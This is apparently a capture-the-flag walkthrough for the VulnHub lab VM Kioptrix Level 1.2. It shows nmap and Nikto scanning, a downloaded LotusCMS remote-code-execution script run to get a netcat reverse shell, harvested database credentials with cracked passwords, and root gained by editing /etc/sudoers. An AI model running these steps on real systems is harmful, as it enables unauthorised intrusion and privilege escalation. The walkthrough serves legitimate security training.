VulnHub: Kioptrix: Level 1.2 (#3)

Link: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

1. Network discovery

nmap -sn <ip>/24

My target is 10.0.2.8.

Reading VM’s file. I have to edit the host file.

On the attacker machine, edit the host file.

nano /etc/hosts

Add IP and host name.

2. Port scan

nmap -Pn 10.0.2.8
nmap -Pn -p1000- 10.0.2.8

There’re only 2 open ports.

3. OS and service scan

nmap -A -p22,80 10.0.2.8

4. Vuln scan

nmap --script vuln -p22,80 10.0.2.8

There’re pages on HTTP service on port 80 and possibility of SQL injection.

6. Nikto scan

nikto -h http://10.0.2.8

There’s “/phpmyadmin” and some other possible vulnerabilities.

7. Access the site

View page source

Explore everything

Last one is login page, it indicated that this site was based on LotusCMS.

8. Exploitation

Search for exploit scripts

searchsploit lotuscms

There’s a script, but it’s metasploit script.

After googling, I came across this script.

Hood3dRob1n/LotusCMS-Exploit

Download it

wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh

Change the permission and run the script

chmod 777 lotusRCE.sh
./lotusRCE.sh

I got the usage.

Run the script again

./lotusRCE.sh kioptrix3.com

Before supplying an IP, I need reverse shell.

Create listener on port 1234

rlwrap nc -lvp 1234

Supplying input

IP: 10.0.2.24 (attacker ip)
PORT : 1234

I select first netcat command

#? 1

Back to listener, now I have a shell. Type some command to verify

ls

I need TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

Verify user

whoami

9. Privilege escalation

cd /home
ls

There’re 3 directories.

In loneferret there’re 2 interesting files.

cat checksec.sh | less

Not much right now.

Read next file

cat CompanyPolicy.README

There’re “sudo ht” command to use.

Let’s try

sudo ht

I don’t have password for ‘www-data’.

Continue exploring in “/www”. Normally, CMS has config file containing username and password for SQL connection and I have to find it.

I found it on gconfig.php

cat gconfig.php

Now I have username and password for mysql.

Since the site also has PHPMyAdmin, I’ll access the MySQL DB w/ GUI.

Accessing database: galley and table: dev_accounts. I have hashes of these users, dreg and loneferret.

Crack it w/ crackstation

Change user to dreg

su dreg
Mast3r

I tried to explore, but it didn’t allow me to use ‘cd’ command.

Tried ‘sudo ht’. User ‘dreg’ is not in the sudoers file.

Change to loneferret

su loneferret
starwars

Tried sudo ht

sudo ht

I could not use this command due to terminal was not fully functional.

Since it involved ‘sudo ht’, my first guessing for privilege escaltion must be sudo permission

Verify sudo permission of loneferret

sudo -l

Tried su

sudo su

Not allowed

Next is ‘ht’ command, I did not know what it is. Eventually, I googled it and found that it is an editor. Because of that, I can run ‘sudo ht’ and edit sudoers file to escalate my privilege.

I need fully functional terminal

ssh loneferret@10.0.2.8

I found a guide to use ht editor.

HT-Editor

Run the ht

sudo ht

Press F3 and type “/etc/sudoers” and press “Enter” to open the file

My first try was removing ‘!’

Press F2 to save and CTRL+c to exit

sudo su -

Still no go

Edit the file again by adding

/bin/bash

Verify editing

sudo -l

sudo /bin/bash -p

Now I’m root.

Find the flag

cd /root

cat Congrats.txt